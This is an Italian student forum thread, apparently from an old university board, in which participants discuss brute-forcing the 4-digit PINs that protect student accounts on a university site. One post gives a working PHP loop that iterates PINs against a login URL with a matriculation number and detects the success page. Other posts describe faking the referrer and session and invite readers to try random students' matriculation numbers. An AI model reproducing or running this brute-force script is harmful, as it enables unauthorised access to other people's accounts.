Show 150 posts per page
|
Pages (2): « 1 [2] Show 150 posts per page |
.dsy:it. (http://www.dsy.it/forum/)
- Forum De Bell Tolls (http://www.dsy.it/forum/forumdisplay.php?forumid=7)
-- Il PIN degli studenti... (http://www.dsy.it/forum/showthread.php?threadid=1713)
vecchia. 
un pin di 4 cifre, con un 56k e un 386 lo sgami in una 30ina di secondi se non ci sono politiche di disabilitazione dopo x tentativi oppure un ritardo dopo l'nesimo errore.
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
Pardon, ma come funzionerebbe un programma che provi diverse combinazioni? Ovvero: costruire un programmino in c che generi e provi vari numeri sono capace anche io. Come però inviare il numero generato al sito e "leggere" la risposta?
int main (void)
{
int n = 0; bool don't_connect = false;
while (don't_connect==false) { genera_numero(&n); don't_connect = prova_numero(&n);}
genera_danno(); 8-)
}
Probabilmente la login viene inviato attraverso un comando post o get al server .....quindi basta controllare la form e fare l'invio!
Per controllare basta vedere quello ch ti rimanda il server..almeno penso!
__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®
isi...
se il form non fa un controllo del referrer basta un fopen in php
PHP:
$trovato = 0;
$pin = 0;
while(!$trovato) {
$url=sprintf("http://www.dominio.it/path/del/cgi?matr=123123&pin=%04d",$pin);
$pin++;
$fp = fopen($url,"r");
if (!$fp) {
echo "squaraus!";
exit(-1);
}
$line = fgets ($fp, 1024); // ecc ecc
// banalissima regexp che valuta l'output in $line cercando un pezzo di html che appare nella pagina di successo
// se lo trova pone $trovato=1
fclose($fp);
}
echo "Il pin è $pin\n";
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
Mino ma dopo tre errori l'account viene disabilitato o no?
Il referrer dovrebbe essere l'url da cui si proviene: in questa ipotesi non si può alterare la url di provenienza in modo da farla apparire "legale"?
la disabilitazione dopo x tentativi non so se ci sia. lo spero vivamente...
falsificare referrer e session è una delle cose più banali che si possan fare
tempo fa scrissi per me uno scrippettino chiamato "enblue" per inviare sms da blu.it via shell: si loggava sulla homepage, simulava il click su "invia sms", compilava il modulo e controllava i risultati...
__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia 
)
__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®
Originally posted by URANIO
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia
__________________
"It is totally natural to die or to be killed, rather than just to live without a certain purpose"
| All times are GMT. The time now is 22:49. | Pages (2): « 1 [2] Show all 23 posts from this thread on one page |
Powered by: vBulletin Version 2.3.1
Copyright © Jelsoft Enterprises Limited 2000 - 2002.